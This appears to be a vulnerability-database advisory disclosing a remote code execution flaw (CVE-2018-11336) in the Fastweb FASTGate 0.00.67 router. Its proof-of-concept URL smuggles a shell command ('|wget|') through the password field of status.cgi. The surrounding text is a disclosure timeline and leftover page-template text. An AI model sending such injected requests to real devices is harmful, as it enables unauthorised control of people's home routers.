Fastweb FASTGate - 0.00.67 RCE Vulnerability

2018.10.13

Procode701 (IT)

Risk: High

Local: No

Remote: Yes

CVE: CVE-2018-11336

CWE: N/A

# Exploit Title: Fastweb FASTGate - 0.00.67 RCE Vulnerability
# Date: 21-05-2018
# Exploit Authors: Procode701
# Contact: https://twitter.com/Procode701
# Vendor: Fastweb
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/
# Version: 0.00.67
# CVE: CVE-2018-11336
 
DESCRIPTION
========================================================================
 
An critical issue was discovered in Fastweb FASTgate 0.00.67 device. 
FASTgate 0.00.67 is vulnerable to Remote Code Execution
 
PROOF OF CONCEPT

[Affected Component]
/status.cgi?_=, Vulnerable field: password=, 
Exploit sample:
http://192.168.1.254/status.cgi_=1526904600131&cmd=3&nvget=login_confirm&password='|wget|'&remember_me=1&sessionKey=NULL&username=jj,


Video https://youtu.be/i3FuUQGA2fo
========================================================================


Timeline

Report to vendor, 20/05/2018  - NOT RESPOND

References:

http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Fastweb FASTGate - 0.00.67 RCE Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.